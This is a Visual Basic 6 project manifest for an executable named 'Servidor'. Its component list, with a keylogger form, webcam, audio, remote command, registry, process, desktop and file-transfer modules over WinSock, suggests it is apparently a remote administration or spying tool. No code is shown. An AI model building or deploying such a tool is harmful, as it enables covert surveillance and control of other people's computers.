Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\SysWOW64\stdole2.tlb#OLE Automation
Reference=*\G{00995812-9105-11D0-A754-00A0C91110C3}#3.0#0#OleGuids3.tlb#Ole Guid and interface definitions 3.0
Module=WinSock32; Module\Module1.bas
UserControl=UserControls\ucListView.ctl
Module=mIOleInPlaceActivate; Module\mIOleInPlaceActivate.bas
Module=mListViewEx; Module\mListViewEx.bas
UserControl=UserControls\ComboBoxEx.ctl
Class=clsSubClass; Class\clsSubClass.cls
Class=cTimer; Class\cTimer.cls
Module=MdlGlobal; Module\MdlGlobal.bas
Module=MdlListViewProgress; Module\MdlListViewProgress.bas
Class=clsConnection; Class\clsConnection.cls
Class=clsFileTransfer; Class\clsFileTransfer.cls
UserControl=UserControls\TabStrip.ctl
Class=clsImgList; Class\clsImgList.cls
UserControl=UserControls\ucToolbar.ctl
UserControl=UserControls\ucStatusbar.ctl
Class=clsMenuImage; Class\clsMenuImage.cls
UserControl=UserControls\ucProgressBar.ctl
UserControl=UserControls\ExplorerFrame.ctl
UserControl=UserControls\ScrollControl.ctl
UserControl=UserControls\UpDownd.ctl
UserControl=UserControls\ucDateTime.ctl
Module=modGdipThumbnailStream; Module\modGdipThumbnailStream.bas
Module=mdlFormNotify; Module\mdlFormNotify.bas
Form=Forms\FrmNotify.frm
Form=Forms\FrmProgresZip.frm
Form=Forms\FrmExplorer.frm
Form=Forms\FrmMain.frm
Form=Forms\FrmWebCam.frm
Class=ClsAviCreator; Class\ClsAviCreator.cls
Form=Forms\FrmKeyLogger.frm
Form=Forms\FrmCmd.frm
UserControl=UserControls\UniText.ctl
Module=UniTextModule; Module\UniTextModule.bas
Module=mIOIPAOTreeView; Module\mIOIPAOTreeView.bas
UserControl=UserControls\ucTreeView.ctl
Form=Forms\FrmRegistry.frm
Form=Forms\FrmEditValue.frm
Form=Forms\FrmProcess.frm
Form=Forms\FrmAudio.frm
Form=Forms\FrmDesktop.frm
Module=MdlINI; Module\MdlINI.bas
ResFile32="Resource\Resource.res"
IconForm="FrmMain"
Startup="FrmMain"
HelpFile=""
Title="Servidor"
ExeName32="Servidor.exe"
Command32=""
Name="Servidor"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
CompilationType=-1
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
